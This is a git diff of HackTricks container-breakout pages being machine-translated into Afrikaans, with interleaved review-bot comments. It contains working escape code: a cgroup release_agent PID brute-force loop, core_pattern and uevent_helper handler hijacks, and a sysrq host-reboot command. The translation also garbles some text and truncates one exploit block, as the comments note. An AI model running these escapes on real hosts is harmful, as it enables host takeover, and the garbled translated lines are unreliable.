@@ -75,20 +72,20 @@ echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release TPID=1 while [ ! -f ${OUTPUT_PATH} ] do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) +if [ $((${TPID} % 100)) -eq 0 ] +then +echo "Checking pid ${TPID}" +if [ ${TPID} -gt ${MAX_PID} ] +then +echo "Exiting at ${MAX_PID} :-(" +exit 1 +fi +fi +# Set the release_agent path to the guessed pid +echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent +# Trigger execution of the release_agent +sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" +TPID=$((${TPID} + 1)) done # Wait for and cat the output @@ -96,19 +93,16 @@ sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
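Review bot: the `@@ -75,20 +72,20 @@` hunk rewrites all fifteen body lines of the PoC's `while` loop only to strip their leading indentation; the shell semantics are unchanged, but this is an unrelated edit inside a fenced code block quoted verbatim from the linked blog post, it makes the nested `if`/`fi` structure harder to read, and it will show up as churn in every future diff of this file. Suggest the translator workflow leave fenced code blocks untouched; the `@@ -96,19 +93,16 @@` hunk shows the same pattern in dropping the blank line after the closing fence.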
- - diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index 03def5893..3d8174f27 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -1,154 +1,143 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected. +Die blootstelling van `/proc` en `/sys` sonder behoorlike naamsruimte-isolasie stel beduidende sekuriteitsrisiko's in, insluitend vergroting van die aanvalsvlak en bekendmaking van inligting. Hierdie gids bevat sensitiewe lêers wat, as dit verkeerd gekonfigureer of deur 'n ongemagtigde gebruiker benader word, kan lei tot ontsnapping uit die houer, wysiging van die gasheer of die voorsiening van inligting wat verdere aanvalle ondersteun. Byvoorbeeld, as `-v /proc:/host/proc` verkeerd gemonteer word, kan dit AppArmor-beskerming omseil as gevolg van sy padgebaseerde aard, wat `/host/proc` onbeskerm laat. 
-**You can find further details of each potential vuln in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts).** +**U kan verdere besonderhede van elke potensiële kwesbaarheid vind in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts).** -# procfs Vulnerabilities +# procfs-kwesbaarhede ## `/proc/sys` -This directory permits access to modify kernel variables, usually via `sysctl(2)`, and contains several subdirectories of concern: +Hierdie gids maak toegang tot die wysiging van kernel-veranderlikes moontlik, gewoonlik via `sysctl(2)`, en bevat verskeie subgidsies van belang: -### **`/proc/sys/kernel/core_pattern`** - - Described in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html). - - Allows defining a program to execute on core-file generation with the first 128 bytes as arguments. This can lead to code execution if the file begins with a pipe `|`. - - **Testing and Exploitation Example**: - ```bash - [ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access - cd /proc/sys/kernel - echo "|$overlay/shell.sh" > core_pattern # Set custom handler - sleep 5 && ./crash & # Trigger handler - ``` +### **`/proc/sys/kernel/core_pattern`** +- Beskryf in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html). +- Maak dit moontlik om 'n program te definieer wat uitgevoer moet word wanneer 'n kernlêer gegenereer word, met die eerste 128 byte as argumente. Dit kan lei tot kodering van kode as die lêer begin met 'n pyp `|`. 
+- **Toets- en uitbuitingsvoorbeeld**: +```bash +[ -w /proc/sys/kernel/core_pattern ] && echo Ja # Toets skryftoegang +cd /proc/sys/kernel +echo "|$overlay/shell.sh" > core_pattern # Stel aangepaste hanterer in +sleep 5 && ./crash & # Trigger hanterer +``` ### **`/proc/sys/kernel/modprobe`** - - Detailed in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). - - Contains the path to the kernel module loader, invoked for loading kernel modules. - - **Checking Access Example**: - ```bash - ls -l $(cat /proc/sys/kernel/modprobe) # Check access to modprobe - ``` +- Uitvoerig beskryf in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Bevat die pad na die kernel-modulelaaier wat aangeroep word vir die laai van kernel-modules. +- **Voorbeeld van toegangstoets**: +```bash +ls -l $(cat /proc/sys/kernel/modprobe) # Toets toegang tot modprobe +``` ### **`/proc/sys/vm/panic_on_oom`** - - Referenced in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). - - A global flag that controls whether the kernel panics or invokes the OOM killer when an OOM condition occurs. +- Verwys na [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- 'n Globale vlag wat beheer of die kernel paniekerig word of die OOM-killer aanroep wanneer 'n OOM-toestand voorkom. ### **`/proc/sys/fs`** - - As per [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), contains options and information about the file system. - - Write access can enable various denial-of-service attacks against the host. +- Volgens [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), bevat dit opsies en inligting oor die lêersisteem. +- Skryftoegang kan verskeie denial-of-service-aanvalle teen die gasheer moontlik maak. ### **`/proc/sys/fs/binfmt_misc`** - - Allows registering interpreters for non-native binary formats based on their magic number. - - Can lead to privilege escalation or root shell access if `/proc/sys/fs/binfmt_misc/register` is writable. 
- - Relevant exploit and explanation: - - [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc) - - In-depth tutorial: [Video link](https://www.youtube.com/watch?v=WBC7hhgMvQQ) +- Maak die registrasie van tolke vir nie-inheemse binêre formate moontlik op grond van hul toorkodegetal. +- Dit kan lei tot bevoorregte eskalasie of toegang tot die wortelshell as `/proc/sys/fs/binfmt_misc/register` skryfbaar is. +- Relevant uitbuiting en verduideliking: +- [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc) +- Diepgaande tutoriaal: [Video-skakel](https://www.youtube.com/watch?v=WBC7hhgMvQQ) -## Others in `/proc` +## Ander in `/proc` ### **`/proc/config.gz`** - - May reveal the kernel configuration if `CONFIG_IKCONFIG_PROC` is enabled. - - Useful for attackers to identify vulnerabilities in the running kernel. +- Kan die kernel-konfigurasie bekend maak as `CONFIG_IKCONFIG_PROC` geaktiveer is. +- Nuttig vir aanvallers om kwesbaarhede in die lopende kernel te identifiseer. ### **`/proc/sysrq-trigger`** - - Allows invoking Sysrq commands, potentially causing immediate system reboots or other critical actions. - - **Rebooting Host Example**: - ```bash - echo b > /proc/sysrq-trigger # Reboots the host - ``` +- Maak dit moontlik om Sysrq-opdragte aan te roep, wat potensieel onmiddellike stelselherlaaiings of ander kritieke aksies kan veroorsaak. +- **Voorbeeld van gasheerherlaaiing**: +```bash +echo b > /proc/sysrq-trigger # Herlaai die gasheer +``` ### **`/proc/kmsg`** - - Exposes kernel ring buffer messages. - - Can aid in kernel exploits, address leaks, and provide sensitive system information. +- Stel kernel-ringingbufferboodskappe bloot. +- Dit kan help met kernel-uitbuitings, adreslekke en die voorsiening van sensitiewe stelselinligting. ### **`/proc/kallsyms`** - - Lists kernel exported symbols and their addresses. - - Essential for kernel exploit development, especially for overcoming KASLR. 
- - Address information is restricted with `kptr_restrict` set to `1` or `2`. - - Details in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Lys kernel-uitgevoerde simbole en hul adresse op. +- Essensieel vir die ontwikkeling van kernel-uitbuitings, veral vir die oorkom van KASLR. +- Adresinligting is beperk met `kptr_restrict` wat op `1` of `2` ingestel is. +- Besonderhede in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). ### **`/proc/[pid]/mem`** - - Interfaces with the kernel memory device `/dev/mem`. - - Historically vulnerable to privilege escalation attacks. - - More on [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Koppelvlak met die kernel-geheue-toestel `/dev/mem`. +- Histories vatbaar vir bevoorregte eskalasie-aanvalle. +- Meer inligting in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). ### **`/proc/kcore`** - - Represents the system's physical memory in ELF core format. - - Reading can leak host system and other containers' memory contents. - - Large file size can lead to reading issues or software crashes. - - Detailed usage in [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/). +- Verteenwoordig die fisiese geheue van die stelsel in ELF-kernformaat. +- Lees kan die inhoud van die gasheerstelsel en ander houers se geheue uitlek. +- 'n Groot lêergrootte kan lei tot leesprobleme of sagtewarefoutmeldings. +- Gedetailleerde gebruik in [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/). ### **`/proc/kmem`** - - Alternate interface for `/dev/kmem`, representing kernel virtual memory. - - Allows reading and writing, hence direct modification of kernel memory. +- Alternatiewe koppelvlak vir `/dev/kmem`, wat die virtuele geheue van die kernel verteenwoordig. +- Maak lees en skryf moontlik, dus direkte wysiging van die kernel-geheue. ### **`/proc/mem`** - - Alternate interface for `/dev/mem`, representing physical memory. 
- - Allows reading and writing, modification of all memory requires resolving virtual to physical addresses. +- Alternatiewe koppelvlak vir `/dev/mem`, wat fisiese geheue verteenwoordig. +- Maak lees en skryf moontlik, wysiging van alle geheue vereis die oplossing van virtuele na fisiese adresse. ### **`/proc/sched_debug`** - - Returns process scheduling information, bypassing PID namespace protections. - - Exposes process names, IDs, and cgroup identifiers. +- Gee prosesbeplanningsinligting terug, omseil PID-naamsruimtebeskerming. +- Stel prosesname, ID's en cgroup-identifiseerders bloot. ### **`/proc/[pid]/mountinfo`** - - Provides information about mount points in the process's mount namespace. - - Exposes the location of the container `rootfs` or image. +- Verskaf inligting oor koppelvlakpunte in die proses se koppelvlaknaamsruimte. +- Stel die ligging van die houer se `rootfs` of beeld bloot. -## `/sys` Vulnerabilities +## `/sys`-kwesbaarhede ### **`/sys/kernel/uevent_helper`** - - Used for handling kernel device `uevents`. - - Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers. - - **Example for Exploitation**: - %%%bash - # Creates a payload - echo "#!/bin/sh" > /evil-helper - echo "ps > /output" >> /evil-helper - chmod +x /evil-helper - # Finds host path from OverlayFS mount for container - host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) - # Sets uevent_helper to malicious helper - echo "$host_path/evil-helper" > /sys/kernel/uevent_helper - # Triggers a uevent - echo change > /sys/class/mem/null/uevent - # Reads the output - cat /output - %%% - +- Word gebruik vir die hanteer van kerneltoestel-`uevents`. +- Skryf na `/sys/kernel/uevent_helper` kan arbitrêre skripte uitvoer wanneer `uevent`-triggerings plaasvind. 
+- **Voorbeeld van uitbuiting**: +%%%bash +# Skep 'n vragstuk +echo "#!/bin/sh" > /evil-helper +echo "ps > /output" >> /evil-helper +chmod +x /evil-helper +# Vind gasheerpad vanaf OverlayFS-koppeling vir houer ### **`/sys/class/thermal`** - - Controls temperature settings, potentially causing DoS attacks or physical damage. +- Beheer temperatuurinstellings, moontlik veroorsaak DoS-aanvalle of fisiese skade. ### **`/sys/kernel/vmcoreinfo`** - - Leaks kernel addresses, potentially compromising KASLR. +- Lekker kernel-adresse, moontlik in gedrang KASLR. ### **`/sys/kernel/security`** - - Houses `securityfs` interface, allowing configuration of Linux Security Modules like AppArmor. - - Access might enable a container to disable its MAC system. +- Bevat `securityfs`-koppelvlak, wat konfigurasie van Linux Security Modules soos AppArmor moontlik maak. +- Toegang kan 'n houer in staat stel om sy MAC-stelsel uit te skakel. -### **`/sys/firmware/efi/vars` and `/sys/firmware/efi/efivars`** - - Exposes interfaces for interacting with EFI variables in NVRAM. - - Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines. +### **`/sys/firmware/efi/vars` en `/sys/firmware/efi/efivars`** +- Blootstelling van koppelvlakke vir interaksie met EFI-variables in NVRAM. +- Foutiewe konfigurasie of uitbuiting kan lei tot gebreekte draagbare rekenaars of onopstartbare gasheer-masjiene. ### **`/sys/kernel/debug`** - - `debugfs` offers a "no rules" debugging interface to the kernel. - - History of security issues due to its unrestricted nature. +- `debugfs` bied 'n "geen reëls" foutopsporingskoppelvlak na die kernel. +- Geskiedenis van sekuriteitsprobleme as gevolg van sy onbeperkte aard. 
-## References +## Verwysings * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts) * [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf) * [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf) @@ -156,16 +145,14 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
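Review bot: the `+` side of the `/sys/kernel/uevent_helper` example in the `@@ -1,154 +1,143 @@` hunk is truncated: the `-` side removes the whole `%%%bash ... %%%` block, but the `+` side stops after `+# Vind gasheerpad vanaf OverlayFS-koppeling vir houer` with no closing `%%%`, so the lines that set the helper path, trigger the uevent and read the output are lost and the unclosed delimiter will swallow the `### **`/sys/class/thermal`**` section and everything after it when rendered (the eleven-line shrink in the hunk header matches the missing lines). Restore the remaining lines and the closing `%%%`. Also in this hunk: `echo Yes` became `echo Ja` inside the core_pattern test command, which edits a command string rather than prose; `Dit kan lei tot kodering van kode` means encoding of code where the source says code execution (`uitvoering van kode`); and `Lekker kernel-adresse` under `/sys/kernel/vmcoreinfo` should be `Lek kernel-adresse`.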
- - diff --git a/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/linux-hardening/privilege-escalation/docker-security/docker-privileged.md index 8020c2f2a..033453588 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-privileged.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-privileged.md @@ -1,27 +1,27 @@ -# Docker --privileged +# Docker --bevoorreg
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## What Affects +## Wat Affekteer Dit -When you run a container as privileged these are the protections you are disabling: +Wanneer jy 'n houer as bevoorreg uitvoer, word hierdie beskermings gedeaktiveer: -### Mount /dev +### Monteer /dev -In a privileged container, all the **devices can be accessed in `/dev/`**. Therefore you can **escape** by **mounting** the disk of the host. +In 'n bevoorregte houer kan **alle toestelle in `/dev/`** benader word. Jy kan dus **ontsnap** deur die skandering van die bediener se skyf te **monteer**. {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne standaard houer" %} ```bash # docker run --rm -it alpine sh ls /dev @@ -30,7 +30,7 @@ core full null pts shm stdin tty zero ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh ls /dev @@ -43,12 +43,12 @@ cpu nbd0 pts stdout tty27 {% endtab %} {% endtabs %} -### Read-only kernel file systems +### Lees-slegs kernel-lêerstelsels -Kernel file systems provide a mechanism for a process to modify the behavior of the kernel. However, when it comes to container processes, we want to prevent them from making any changes to the kernel. Therefore, we mount kernel file systems as **read-only** within the container, ensuring that the container processes cannot modify the kernel. +Kernel-lêerstelsels bied 'n meganisme vir 'n proses om die gedrag van die kernel te wysig. Tog wil ons voorkom dat houerprosesse enige veranderinge aan die kernel maak. Daarom monteer ons kernel-lêerstelsels as **lees-slegs** binne die houer, om te verseker dat die houerprosesse die kernel nie kan wysig nie. {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die verstekhouer" %} ```bash # docker run --rm -it alpine sh mount | grep '(ro' 
@@ -59,7 +59,7 @@ cpuacct on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,c ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh mount | grep '(ro' @@ -67,16 +67,16 @@ mount | grep '(ro' {% endtab %} {% endtabs %} -### Masking over kernel file systems +### Maskering oor kernel-lêersisteme -The **/proc** file system is selectively writable but for security, certain parts are shielded from write and read access by overlaying them with **tmpfs**, ensuring container processes can't access sensitive areas. +Die **/proc**-lêersisteem is selektief skryfbaar, maar vir sekuriteit is sekere dele beskerm teen skryf- en leestoegang deur dit met **tmpfs** te oorlê, wat verseker dat houerprosesse nie toegang tot sensitiewe areas kan verkry nie. {% hint style="info" %} -**tmpfs** is a file system that stores all the files in virtual memory. tmpfs doesn't create any files on your hard drive. So if you unmount a tmpfs file system, all the files residing in it are lost for ever. +**tmpfs** is 'n lêersisteem wat al die lêers in virtuele geheue stoor. tmpfs skep geen lêers op jou harde skyf nie. As jy 'n tmpfs-lêersisteem ontlaai, gaan al die lêers wat daarin woon, vir ewig verlore. {% endhint %} {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die verstekhouer" %} ```bash # docker run --rm -it alpine sh mount | grep /proc.*tmpfs @@ -86,7 +86,7 @@ tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh mount | grep /proc.*tmpfs 
@@ -94,16 +94,16 @@ mount | grep /proc.*tmpfs {% endtab %} {% endtabs %} -### Linux capabilities +### Linux-vermoëns -Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read: +Houer-enjins begin die houers met 'n **beperkte aantal vermoëns** om te beheer wat binne die houer gebeur. **Bevoorregte** eenhede het **alle** die **vermoëns** toeganklik. Om meer te leer oor vermoëns, lees: {% content-ref url="../linux-capabilities.md" %} [linux-capabilities.md](../linux-capabilities.md) {% endcontent-ref %} {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die verstekhouer" %} ```bash # docker run --rm -it alpine sh apk add -U libcap; capsh --print @@ -114,7 +114,7 @@ Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setg ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh apk add -U libcap; capsh --print 
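Review bot: in the Linux-vermoëns paragraph, "**Bevoorregte** eenhede het **alle** die **vermoëns** toeganklik" is ungrammatical ("alle die" should be "al die") and "eenhede" (units) does not convey "privileged ones" (i.e. privileged containers); "Bevoorregte houers het al die vermoëns beskikbaar" reads correctly. The tab title "Binne die verstekhouer" here differs yet again from the earlier hunks' renderings of "Inside default container".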
@@ -126,18 +126,18 @@ Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fset {% endtab %} {% endtabs %} -You can manipulate the capabilities available to a container without running in `--privileged` mode by using the `--cap-add` and `--cap-drop` flags. +Jy kan die vermoëns wat beskikbaar is vir 'n houer manipuleer sonder om in `--privileged`-modus te loop deur die `--cap-add` en `--cap-drop` vlae te gebruik. ### Seccomp -**Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here: +**Seccomp** is nuttig om die **syscalls** wat 'n houer kan aanroep, te **beperk**. 'n Standaard seccomp-profiel is standaard geaktiveer wanneer docker-houers uitgevoer word, maar in bevoorregte modus is dit gedeaktiveer. Lees meer oor Seccomp hier: {% content-ref url="seccomp.md" %} [seccomp.md](seccomp.md) {% endcontent-ref %} {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die standaard houer" %} ```bash # docker run --rm -it alpine sh grep Seccomp /proc/1/status @@ -146,7 +146,7 @@ Seccomp_filters: 1 ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh grep Seccomp /proc/1/status 
@@ -155,86 +155,80 @@ Seccomp_filters: 0 ``` {% endtab %} {% endtabs %} - ```bash # You can manually disable seccomp in docker with --security-opt seccomp=unconfined ``` - -Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster, the **seccomp filter is disabled by default** +Verder moet daarop gelet word dat wanneer Docker (of ander CRIs) in 'n **Kubernetes**-groep gebruik word, die **seccomp-filter standaard gedeaktiveer** is. ### AppArmor -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. +**AppArmor** is 'n kernel-verbetering om **houers** tot 'n **beperkte** stel **hulpbronne** met **per-program profiele** te beperk. Wanneer jy met die `--privileged` vlag hardloop, word hierdie beskerming gedeaktiveer. {% content-ref url="apparmor.md" %} [apparmor.md](apparmor.md) {% endcontent-ref %} - ```bash # You can manually disable seccomp in docker with --security-opt apparmor=unconfined ``` - ### SELinux -Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied. +Die uitvoer van 'n houer met die `--privileged` vlag deaktiveer **SELinux-etikette**, wat veroorsaak dat dit die etiket van die houermotor erf, tipies `unconfined`, wat volle toegang gee soortgelyk aan die houermotor. In rootless-modus gebruik dit `container_runtime_t`, terwyl in root-modus `spc_t` toegepas word. 
